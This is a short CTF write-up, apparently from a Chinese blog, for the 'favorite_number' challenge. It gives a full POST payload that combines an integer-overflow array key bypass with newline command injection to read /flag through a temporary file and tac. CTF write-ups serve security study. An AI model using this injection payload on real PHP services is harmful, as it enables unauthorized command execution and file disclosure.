当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- 嵌入式Qt-做一个秒表
- Nacos interview questions
- Five speakers: seventy genius_platform software platform development 】 【 turn YUY2 RGB24 implementation source code
- golang源码分析(10)slice
- 德国客户对文档管理系统、工作流自动化软件 DocuWare 的评价
- Mysql——字符串函数
- 小程序毕设作品之微信体育馆预约小程序毕业设计成品(7)中期检查报告
- executeScript异步执行的时候没有返回值的原因
- 莱斯大学胡侠团队 ICML 2022 杰出论文: 新型图数据增强方法 G-Mixup|附作者对话
- Inconsistency between oracle and mysql statement results
猜你喜欢
随机推荐
什么是实时流引擎?
When Oracle analyzes the archive log content, it finds many nulls?
JS数组删除其中一个元素
golang源码分析(6):sync.Mutex sync.RWMutex
golang源码分析(8):m、p、g、shedt、sudog
融云「 IM 进阶实战高手课」系列直播上线
LeetCode·76.最小覆盖子串·滑动窗口
MySQL索引
NoSQL之redis缓存雪崩、穿透、击穿概念解决办法
npm install 编译时报“Cannot read properties of null (reading ‘pickAlgorithm‘)“
npm install 报错问题解决合集
一文搞懂│php 中的 DI 依赖注入
深圳地铁16号线二期进入盾构施工阶段,首台盾构机顺利始发
蔚来杯2022牛客暑期多校训练营5 ABCDFGHK
小程序毕设作品之微信体育馆预约小程序毕业设计成品(5)任务书
每日优鲜倒了,叮咚买菜的春天在哪?
图解LeetCode——622. 设计循环队列(难度:中等)
golang源码分析(5):sync.Once
LeetCode·每日一题·
全面认识二极管,一篇文章就够了